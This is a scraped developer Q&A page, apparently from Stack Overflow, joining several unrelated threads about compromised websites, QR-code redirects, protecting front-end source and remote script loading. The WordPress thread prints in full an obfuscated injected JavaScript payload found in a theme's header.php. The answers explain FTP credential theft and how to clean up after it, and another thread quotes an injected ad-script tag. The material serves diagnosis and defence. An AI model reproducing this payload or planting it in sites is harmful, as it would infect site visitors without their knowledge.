Malicious? Code in my JS file that wasn't there previously - javascript
I don't know too much about web security but I found a piece of code in a javascript file of mine yesterday that would not have been added by me or anyone else with access to my website.
Nothing bad seems to have been happening on the site so I wouldn't have worried that much except that I have been consistently told by Google Adwords that I have malware on my website. Every time I ask them to investigate however, neither they nor google search console can find anything.
The piece of code in question was this something like this:
<script type="text/javascript" src="http://synchronize.exsads.com/click.js">
The only reason I found it was because it gave me an error in the dev console because the file wasn't able to be loaded.
I have no idea how the code got there. I've been trying to read up on code injections and XSS attacks but i don't really understand it and it seems like that has more to do with sending malicious code back to a server instead of actually changing the code within files. (please correct me if I'm wrong)
Is there a specific security vulnerability that would allow someone to access the code on my website, and if so, what steps do I have to take to prevent that? (Details or easy to understand resources please, much appreciated!)
That JS insert ads on your site.
Search manually for a extrange PHP file (i'll asume php), they generate extra HTML and insert some ads on your site.
EDIT
Ok, it's not a CMS. Change your FTP password and access to CPanel or PLESK.
Follow this steps: enter over FTP to the files on your hosting, look for a obvious with a extrange name .php file or .js, that file is the corrupted one.
Other solution: download all site over FTP and scan with a good antivirus.
Related
How to do a server redirect of URL to a different URL if the traffic is accessing from static QR code
I've always found this forum helpful. So I'm faced with a big dilemma here and was hoping someone here could help :D HERE'S THE SITUATION: We have multiple static QR codes that were printed on thousands of boxes which have already been distributed that go to the wrong URL. Unfortunately the designer didn't make the QR code dynamic, so we don't have the option of editing the URL through the QR code generator's interface. We are a white label manufacturer and provide packaging to tons of clients, so what happened was a batch of qr codes got put on the wrong brand's packaging and so as you could imagine its a huge mess. Hoping someone could help ya girl out! :D I've decided that our best bet would be to implement automatic redirects of the individual pages on the server side. My question is, is there any type of script that would be able to redirect traffic ONLY coming from a QR Code scan?? I've heard of Bootstrap being able to route traffic based on device and browser, etc. So I'm remaining hopeful that someone has heard of a way of doing this. And if there is such magical code, what file or table to I need to edit? Btw I have phpmyadmin but no cPanel. Thank you SO MUCH in advance! Side Note - NO CPANEL! I'm using Wordpress 6.1 on wordpress managed hosting through GoDaddy - and so I do not have access to a cPanel unfortunately :( I tried going through the QR code generator's interface to "edit" the URL of the QR Code, however the QR code was not created as dynamic. It is a static QR Code. And lastly, the reason why we can't just simply sticker over the wrong QR code with a new one is because the boxes were already distributed. Danii
It depends on what URL it goes to. If it goes to your site's domain, e.g. it shows a 404 page of your site or another page, then it is easy to fix. There are plugins for redirection and the most downloaded one and free is Redirection. Install the plugin Go to the plugin's settings page Open the tab "Redirects" Add a new redirect at the bottom of the page see the screenshot
Prevent users from reusing website source files (downloading is okay)
UPDATE: Something's wrong with stackoverflow. It seems people couldn't read the first line of the question properly and they start preaching about "how websites can't be downloaded" which is not exactly the question. So here is the question in a more specific way: How to get hosted server's IP address (or any other information which is unique to the hosted server) using jQuery. Googling doesn't help much. Now, please don't start with "getting client's IP address" or "this can't be done". I know this is nearly impossible; but if someone can get me close to the idea, that'll do. Oringinal Question: I know users can download the source files if they can see it in their browser. What I am trying to do is stop them from reusing it. Like checking IP of hosted server and redirecting to the original domain if the files are hosted in a different server. Using PHP (or any server programs) won't do as the end user will be getting the final html/css/js files. Basically, I don't want anyone to download and host/reuse website files. Thanks in advance.
Javascript is code, and can be obfuscated. This makes it so difficult to maintain that it's usually easier for the end user to re-write from scratch. Try Googling for "Javascript Obfuscator". With HTML and CSS, it's pretty much open to the user. Not much you can do about that!
If you make website in PHP you will write some code that gets translated into end-html that user can view and download. So your source file in PHP is unreachable for end-user. Like in Wordpress your code could be only few rows and end html could be hundreds of rows long because it reads data from a database and puts it into html. If you write scripts in javascript you can not protect it from downloading and reusing that.
This can't be helped. If the viewer can view your website he can download the front-end of the website. If your worried about someone downloading your server-side scripts, you don't have to because server side cannot be downloaded through the front-end.
Why not CDN everything?
It looks like AJAX is indeed unable (at least for all practical purposes) to write foreign HTML to the current page. But what if your CDN website had, say, a JS that would simply document.write() everything? Then your HTML document would have nothing but a remote script. <html> <script src="https://pastebin.com/raw.php?i=0wm5v7i6"> </script> </html> I tried this. Funny thing is, sometimes it works and other times it does a kind of security error: Why doesn't this work? What if, on your own website, you simply put everything on an easy host like Google Drive?
What if, on your own website, you simply put everything on an easy host like Google Drive? That is possible, unless You want control over your website and don't want to depend on the security and availibility of another site, or that somebody reports your pastebin as abuse and it gets deleted. You want to make proper use of security features like content security policy and don't want to allow everything from pastebin.com. You want search engines to find you. Although at least google does limited interpretation of JavaScript I doubt that they will handle this content the way you like.
From the looks of it, PasteBin doesn't supply content over SSL (https). You've put https in the URL to your script, but PasteBin just redirects this request to http, and the net effect is that you are trying to access a script over http when the page is accessed over https, and Chrome prevents that. Just try going to https://pastebin.com/raw.php?i=0wm5v7i6: your browser will be redirected to http://pastebin.com/raw.php?i=0wm5v7i6.
Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
Unfortunately my site was blocked for containing Malicious Javascript by AVG and Google. The malicious code pasted below, was somehow injected into the header.php theme file on the latest version of Wordpress. I checked all the files and removed any suspicious looking plugins to make sure this doesn't happen again. The theme is from a very reputed vendor, so I cant see it happening because of the Theme. I am looking to know how this was done so that it doesnt happen again. Host: 1&1 Hosting WordPress: 3.5.1 PHP: 5.2.17 Running on: Apache Here is the malicious code: <script type="text/javascript" language="javascript"> ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,174,174,176,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,174,174,176,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,150,151,161,163,62,147,163,162,170,166,163,160,145,150,161,155,162,155,167,170,166,145,170,155,172,163,62,162,151,170,63,150,170,150,62,164,154,164,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,174,174,176,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,174,174,176,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
The code you posted above is usually an indication of stolen FTP credentials. I'm not certain if 1and1 gives you access to FTP logs, but if so, look in there. You may find proof. But we've cleaned over 160,000 websites and we've seen that exact code in sites where we do have access to the FTP logs and in every case it's been stolen FTP credentials. The hackers know that many people have FTP access to websites. So their viruses are designed to steal FTP passwords. First, change all passwords. Then don't login until after you've run a full virus scan of your computer. Don't give out the new passwords until others have run a full system virus scan of their computer. A good virus cleaner is Malwarebytes. One thing you should do is to search all files for the string: 44,152,171 (in your case). The reason is that while you'll find the above code in .htm/.html/.js files, in .php files the hackers use mostly the same code, but it's "echo'd" so many of the special characters are escaped in the .php code. You'll see maybe an opening php tag <?php or short version <? followed by a series of spaces then an identifier #879076# (for instance) then more spaces then "echo " followed by more spaces and then the opening script tag. The added spaces are designed to try and hide the malicious code to off the screen when viewed with a text editor.
How to dynamically add code to content script based on IP
I wrote a pretty extensive chrome extension for mafia wars on facebook. The problem is that i gave it to a few people, who gave it to others. What I want is to add my friends ips to my server's database, which i can do. but when i give out the extension, i want as little code in it as possible, for obvious reasons. I have found no way to dynamically add more code to a content script though. what i cant do: keep my code on my server as a js file and only allow access to file based on ip, dynamically add the code to the chrome extension
You can inject content script on demand using chrome.tabs.executeScript(). The rest of your plan sounds good.